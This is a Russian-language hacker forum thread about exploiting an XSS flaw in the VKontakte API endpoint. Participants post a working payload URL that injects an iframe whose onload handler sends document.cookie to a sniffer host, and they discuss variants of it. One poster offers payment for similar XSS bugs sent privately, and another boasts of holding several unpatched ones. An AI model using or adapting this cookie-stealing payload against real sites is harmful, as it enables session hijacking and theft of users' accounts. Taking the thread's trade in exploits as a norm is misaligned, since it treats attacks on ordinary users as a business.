народ, а есть шанс немного переписать ее? всмысле можно повертеть с фильтрами или они образноговоря одним щелчком мыши применили свои мегакрутые фильтры для этого поля? Короче говоря стоит ли овечка выделки?
какбы у меня появилось предложение жаль невовремя - надо было раз уже не захотели сразу тем утереть рассылать всем сообщения чтоб трындели "уже прикрыли" zzzz Еще вопросик, а как с API вконтакте работать? Всмысле ручками потрогать все эти поля
а у когонить такое вылетало? <?xml version="1.0" encoding="utf-8" ?> - <error> <error_code>101</error_code> <error_msg>Invalid application API ID</error_msg> - <request_params list="true"> - <param> <key>v</key> <value>2.0</value> </param> - <param> <key>sig</key> <value>'; бывшее поле ввода хсс</value> </param> - <param> <key>format</key> <value>JSON";</value> </param> </request_params> </error>
короче я сдесь чето помудился, зашол на api.vkontakte.ru/api.php открыл исходник и что же там написано ? а написано там <?xml version="1.0" encoding="utf-8"?> <error>Invalid application API ID</error> к нашему скрипту http://api.vkontakte.ru/api.php?v=2.0&sig=<iframe+src=.+onload=location.href='http://sniffer?'%2Bdocument.cookie>&format=JSON там где v=2.0 я поменял на v=1.0 тоесть получился http://api.vkontakte.ru/api.php?v=1.0&sig=<iframe+src=.+onload=location.href='http://sniffer?'%2Bdocument.cookie>&format=JSON теперь пишит {"error":"Invalid application API ID"} теперь потрепаюсь над этим может что нибудт и получиться......
XSS то работала! Не пойму нах в паблик было кидать ?)) Можно было в приват скинуть и реально подняться. Если ещё кто баги найдёт,пишите в личку,хорошо заплачу за подобные XSSы --------- Изя , ты коммерчески не подкован ))
Если бы ее в приват кидали, ты бы ее и не поюзал как и сейчас, а че вы все ноите, там их щас ппц много стало. У меня уже активка и две пассивки!!!
